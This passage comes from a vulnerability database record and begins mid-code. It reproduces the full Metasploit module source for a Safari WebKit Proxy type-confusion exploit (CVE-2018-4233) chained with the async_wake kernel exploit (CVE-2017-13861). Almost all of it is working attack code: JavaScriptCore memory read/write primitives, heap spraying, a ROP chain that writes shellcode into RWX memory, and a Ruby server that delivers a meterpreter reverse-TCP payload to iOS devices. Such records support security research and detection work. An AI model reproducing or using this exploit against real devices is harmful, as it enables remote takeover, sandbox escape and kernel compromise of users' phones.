fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var 
vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? 
'\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || 
Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 
(gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n 
arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no earthly idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next 
gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? 
'\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try {\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? 
\" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/webkit_createthis.rb"}, {"lastseen": "2020-10-14T07:31:08", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. 
The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.\n", "published": "2019-06-02T02:19:24", "type": "metasploit", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13861", "CVE-2018-4233"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. 
The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) 
like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: 
jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 
0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) 
{\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) {\n unboxed[0] = i2f(addr)\n return boxed[0]\n },\n write64: function(where, what) {\n set_victim_addr(where)\n victim_write(this.fakeobj(what))\n reset_victim_addr()\n },\n read64: function(where) {\n set_victim_addr(where)\n var res = this.addrof(victim_read())\n reset_victim_addr()\n return res;\n },\n write_non_zero: function(where, values) {\n for (var i = 0; i < values.length; ++i) {\n if (values[i] != 0)\n this.write64(where + i*8, values[i])\n }\n },\n readInt64: function(where) {\n if (where instanceof Int64) {\n where = Add(where, 0x10);\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = where.asDouble();\n } else {\n set_victim_addr(where);\n }\n boxed[0] = victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? 
get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = 
